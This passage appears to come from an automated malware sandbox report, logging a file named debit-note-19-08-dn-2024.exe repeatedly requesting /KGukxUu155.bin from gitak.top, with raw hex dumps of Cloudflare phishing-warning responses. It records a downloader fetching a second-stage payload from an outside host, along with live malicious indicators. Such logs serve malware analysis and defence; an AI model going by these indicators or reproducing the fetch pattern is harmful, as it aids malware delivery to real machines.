                              2024-08-26 13:39:25 UTC1369INData Raw: 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 58 45 64 7a 2e 70 78 66 4a 46 61 34 7a 35 75 50 73 59 62 39 41 42 46 50 66 65 75 4e 4e 44 71 30 69 37 33 32 72 30 7a 77 63 37 55 2d 31 37 32 34 36 37 39 35 36 35 2d 30 2e 30 2e 31 2e 31 2d 2f 4b 47 75 6b 78 55 75 31 35 35 2e 62 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 3d 22 62 61
                              Data Ascii: type="hidden" name="atok" value="XEdz.pxfJFa4z5uPsYb9ABFPfeuNNDq0i732r0zwc7U-1724679565-0.0.1.1-/KGukxUu155.bin"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="ba
                              2024-08-26 13:39:25 UTC844INData Raw: 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 61 3e 3c 2f 73 70
                              Data Ascii: den">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare</a></sp
                              2024-08-26 13:39:25 UTC5INData Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              42192.168.11.2049859172.67.207.2194435076C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe
                              TimestampBytes transferredDirectionData
                              2024-08-26 13:39:35 UTC168OUTGET /KGukxUu155.bin HTTP/1.1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                              Host: gitak.top
                              Cache-Control: no-cache
                              2024-08-26 13:39:35 UTC551INHTTP/1.1 200 OK
                              Date: Mon, 26 Aug 2024 13:39:35 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: close
                              X-Frame-Options: SAMEORIGIN
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Myj6Qf9ZltXdR8Yw5Z2DS%2BFPM%2F7Q%2FFt8z5MSVDMh0Fg1VjvN9nX%2FyE4Soopo3oQrA%2BfpC%2F9xFnCp9%2F3yl6JJ4Nu7zX0hrrq%2BDO7S%2BJ3KJQ68dU8fFvLVZXf2qVg%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8b943a92ff188f23-IAD
                              2024-08-26 13:39:35 UTC818INData Raw: 31 31 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                              Data Ascii: 113a<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                              2024-08-26 13:39:35 UTC1369INData Raw: 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b
                              Data Ascii: cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cook
                              2024-08-26 13:39:35 UTC1369INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 77 42 67 6a 73 6b 6f 39 4b 44 62 54 78 4d 5f 49 43 66 76 46 51 2e 2e 64 73 36 55 52 39 33 49 4c 6f 6d 44 37 4e 76 68 79 45 44 38 2d 31 37 32 34 36 37 39 35 37 35 2d 30 2e 30 2e 31 2e 31 2d 2f 4b 47 75 6b 78 55 75 31 35 35 2e 62 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d
                              Data Ascii: <input type="hidden" name="atok" value="wBgjsko9KDbTxM_ICfvFQ..ds6UR93ILomD7NvhyED8-1724679575-0.0.1.1-/KGukxUu155.bin"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class=
                              2024-08-26 13:39:35 UTC862INData Raw: 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e
                              Data Ascii: r-separator sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">
                              2024-08-26 13:39:35 UTC5INData Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              43192.168.11.2049860172.67.207.2194435076C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe
                              TimestampBytes transferredDirectionData
                              2024-08-26 13:39:45 UTC168OUTGET /KGukxUu155.bin HTTP/1.1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                              Host: gitak.top
                              Cache-Control: no-cache
                              2024-08-26 13:39:46 UTC539INHTTP/1.1 200 OK
                              Date: Mon, 26 Aug 2024 13:39:46 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: close
                              X-Frame-Options: SAMEORIGIN
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QSnSEpx0SqVu8SFCMqBfdALbbyGDE8%2BMDbmAbQKs0zy4xMWFe25qTXHC5sfYUE76EgjdRCuavJGKsntZNsUOCv39sZKoXnPDiOHLLUZH%2B%2FQMg1VGXnyh98MkRQM%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8b943ad47e99c580-IAD
                              2024-08-26 13:39:46 UTC830INData Raw: 31 31 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                              Data Ascii: 113a<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                              2024-08-26 13:39:46 UTC1369INData Raw: 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 27 29 3b 0a
                              Data Ascii: .css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert');
                              2024-08-26 13:39:46 UTC1369INData Raw: 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 77 49 58 58 74 35 33 4f 6f 6d 51 31 59 4a 70 42 33 72 36 33 34 32 76 53 63 45 70 5f 4f 37 2e 47 36 4d 4d 6a 4d 77 34 47 62 7a 49 2d 31 37 32 34 36 37 39 35 38 35 2d 30 2e 30 2e 31 2e 31 2d 2f 4b 47 75 6b 78 55 75 31 35 35 2e 62 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79
                              Data Ascii: <input type="hidden" name="atok" value="wIXXt53OomQ1YJpB3r6342vScEp_O7.G6MMjMw4GbzI-1724679585-0.0.1.1-/KGukxUu155.bin"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" sty
                              2024-08-26 13:39:46 UTC850INData Raw: 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61 72 65 3c 2f
                              Data Ascii: sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare</
                              2024-08-26 13:39:46 UTC5INData Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              44192.168.11.2049861172.67.207.2194435076C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe
                              TimestampBytes transferredDirectionData
                              2024-08-26 13:39:56 UTC168OUTGET /KGukxUu155.bin HTTP/1.1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                              Host: gitak.top
                              Cache-Control: no-cache
                              2024-08-26 13:39:56 UTC539INHTTP/1.1 200 OK
                              Date: Mon, 26 Aug 2024 13:39:56 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: close
                              X-Frame-Options: SAMEORIGIN
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=10TCmlCXJkrqMEljigA78EIQyt7hOjffvpuakfcI6FzRl%2B8EU%2BsOPRGot8Tud%2B051gvE0GO5QyZT3ngytZxVRC1x3PfnojDD2Mgg3AThbf9lGLUS7tFkd3NBRf4%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8b943b15f8b95943-IAD
                              2024-08-26 13:39:56 UTC830INData Raw: 31 31 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                              Data Ascii: 113a<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                              2024-08-26 13:39:56 UTC1369INData Raw: 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 27 29 3b 0a
                              Data Ascii: .css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert');
                              2024-08-26 13:39:56 UTC1369INData Raw: 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 53 70 56 35 65 50 6c 43 73 5a 67 76 58 30 70 50 67 50 37 4b 4f 34 32 37 54 57 4d 2e 67 5a 59 6f 69 58 4f 49 61 4c 68 64 6e 74 34 2d 31 37 32 34 36 37 39 35 39 36 2d 30 2e 30 2e 31 2e 31 2d 2f 4b 47 75 6b 78 55 75 31 35 35 2e 62 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79
                              Data Ascii: <input type="hidden" name="atok" value="SpV5ePlCsZgvX0pPgP7KO427TWM.gZYoiXOIaLhdnt4-1724679596-0.0.1.1-/KGukxUu155.bin"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" sty
                              2024-08-26 13:39:56 UTC850INData Raw: 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61 72 65 3c 2f
                              Data Ascii: sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare</
                              2024-08-26 13:39:56 UTC5INData Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              45192.168.11.2049862172.67.207.2194435076C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe
                              TimestampBytes transferredDirectionData
                              2024-08-26 13:40:06 UTC168OUTGET /KGukxUu155.bin HTTP/1.1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                              Host: gitak.top
                              Cache-Control: no-cache
                              2024-08-26 13:40:07 UTC543INHTTP/1.1 200 OK
                              Date: Mon, 26 Aug 2024 13:40:06 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: close
                              X-Frame-Options: SAMEORIGIN
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=orgAroVsW%2Fgp4aJ6%2Fofnd92RP9B6wuFLRkvQpOrYs5GI5aPKsH4RKnOBctH6%2FFkj6XalEMYmxO7lkMMcYlm6dj7dUoHUbGC6VYaYHBgn%2FCW3mfd%2FFHPJRoHPb6M%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8b943b577f89596d-IAD
                              2024-08-26 13:40:07 UTC826INData Raw: 31 31 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                              Data Ascii: 113a<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                              2024-08-26 13:40:07 UTC1369INData Raw: 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69 65 2d 61 6c 65 72 74
                              Data Ascii: s.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert
